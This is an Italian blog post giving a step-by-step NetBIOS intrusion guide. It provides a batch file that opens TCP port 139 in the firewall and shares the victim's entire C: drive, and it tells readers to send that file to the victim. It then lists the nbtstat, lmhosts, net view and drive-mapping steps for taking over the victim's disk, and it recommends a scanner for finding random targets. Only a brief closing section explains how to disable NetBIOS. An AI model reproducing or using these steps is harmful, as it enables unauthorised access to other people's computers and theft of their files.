Per poter entrare in un pc dal NETBIOS:
Per prima cosa dovete avere l’Ip della vittima con il netbios ATTIVO ossia con la porta 139 aperta e il disco “C:\” condiviso.
per aprire la porta 139 e condividere il disco C:\ di un computer, aprite il blocco note e inserite il seguente codice:
CODICE
netsh firewall add portopening TCP 139 PORTAWEB
net share disco=C:\
Adesso rinominate (nomefile).bat e mandatelo alla vittima! XD Se invece volete entrare in un pc a caso con il netbios attivo scaricate xSharez (il quale scanerrizza vari ip e quelli con la 139 aperta li inserisce in una lista)
DOPO AVER TROVATO L’IP CON IL NETBIOS ATTIVO E CON IL DISCO C:\ CONDIVISO:
-Andate su start
-Digitate:
cd c:/windows
Nbtstat -A “IP” (l’ip della persona con il netbioz attivo)
A questo punto vi comparirà una specie di tabella con nome,tipo e stato……
Prendiamo il nome e l’ip della nostra vittima e scriviamo nel DOS:
Edit c:/windows/lmhosts
“IP”"NOME VITTIMA”#PRE(ci va prima l’IP della nostra vittima scelta nella tabella precedente e poi il nome).
Adesso andate su salva e poi su esci——–>vi ritroverete sul DOS e a questo punto digitate:
Nbtstat -R
Net View //”NOME VITTIMA”
Se nn avete sbagliato niente vi uscirà la lista delle periferiche condivise(HD,Stampanti)ecc.
Ora basta andare in RISORSE DI RETE e cliccare su STRUMENTI, CONNETTI A UNITA’ RETE e inserite come nome dell’unità rete:
//”NOME VITTIMA”/C
L’unità C ora è condisa e avete il suo HD nelle vostre mani. XDXD
COME DIFENDERSI DA QUESTO ATTACCO:
Andate su pannello di controllo>> rete e connessioni internet>> connessioni di rete, fate click con il tasto destro su una connessione e andate su proprietà>> rete e deselezionate il “client per reti microsoft”, adesso cliccate su “protocollo internet tcp-ip” e andate su proprietà>> avanzate>> wins e
disabilitate il netbios, ora cliccate su applica e fate ok.
Nessun commento:
Posta un commento